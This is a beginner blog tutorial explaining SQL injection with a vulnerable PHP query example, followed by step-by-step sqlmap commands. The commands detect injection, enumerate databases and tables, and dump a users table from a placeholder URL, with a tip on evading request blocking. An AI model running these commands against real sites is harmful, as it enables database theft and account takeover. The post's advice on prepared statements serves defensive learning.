What is SQL Injection? How to do it with sqlmap?

SQL Injection is around 18 years old technique yet many web applications are prone to it. SQL Injection is a code injection technique.
 For simplicity, we will not get into its definition and technical terms.

So what is SQL Injection anyways?

To understand this, let us first know what SQL is. SQL (Structured Query Language) is simply a language used to perform operations on a database. So in simple terms, SQL Injection is a technique where an attacker injects code and retrieves the information from the database.

If the attacker can retrive information of users from database, or any other sensitive information then it is a matter of concern to you if you’re the one who own the database.

Take an example of a website. Suppose it has an admin panel which controls a lot of things. If the attacker can get the admin credentials from the database with SQL Injection technique, then maybe you’re doomed if you own the site.

SQL Injection is really a matter of concern.

Let us understand how an attacker can attack with a very popular tool called sqlmap.

There are plenty of tutorials available on how to install sqlmap on the internet. So we will focus more on its use.

Suppose a URL, http://example.com/page.php?id=27

What is happening in the backend here? A SQL Query like following may be written:

SELECT * FROM posts WHERE id=’$_GET[“id”]’

Please note that: this query is not prepared. ie. the victim can change the query by injecting code by using id parameter.

Always remember to use prepared statements while writing SQL queries.

Now coming back to attack with sqlmap, let us understand how it is done.

STEP 1 — Check whether the victim URL is vulnerable or not.

sqlmap -u "http://example.com/page.php?id=27"

If you find out that it is vulnerable, then follow next steps.

STEP 2 — Get database list.

sqlmap -u "http://example.com/page.php?id=27" --dbs

STEP 3 — Select a database of your concern. Let’s say it is “simpledatabase”. Now, get tables from it.

sqlmap -u "http://example.com/page.php?id=27" --tables -D simpledatabase

STEP 4 — Now you will see a list of tables from the database. “users” table may be what an attacker needs. So dump the users table by:

sqlmap -u "http://example.com/page.php?id=27" --dump -T users -D simpledatabase

And you have all the data of users table.

Sometimes --random-agent argument needs to be passed as server blocks a user if too many requests are done within a short time.

Now if similarly, the attacker gets login credentials for the admin panel, the attacker can pretty much write on your site that it is hacked. Who knows what will happen.

I hope that this stuff is clear to you.

Please Note: This tutorial is for learning purpose only. Don’t do any illegal activities. I am not responsible for any readers activities.

As a developer, you should always prepare your SQL statements. If you’re using PHP please refer to PDO library and learn to prepare statements with it.

For now, I think this is enough for what the title says. Comment down your feedbacks.

Thank You!

What is SQL Injection? How to do it with sqlmap?


Originally published at zhow.in on September 27, 2017.

One clap, two clap, three clap, forty?

By clapping more or less, you can signal to us which stories really stand out.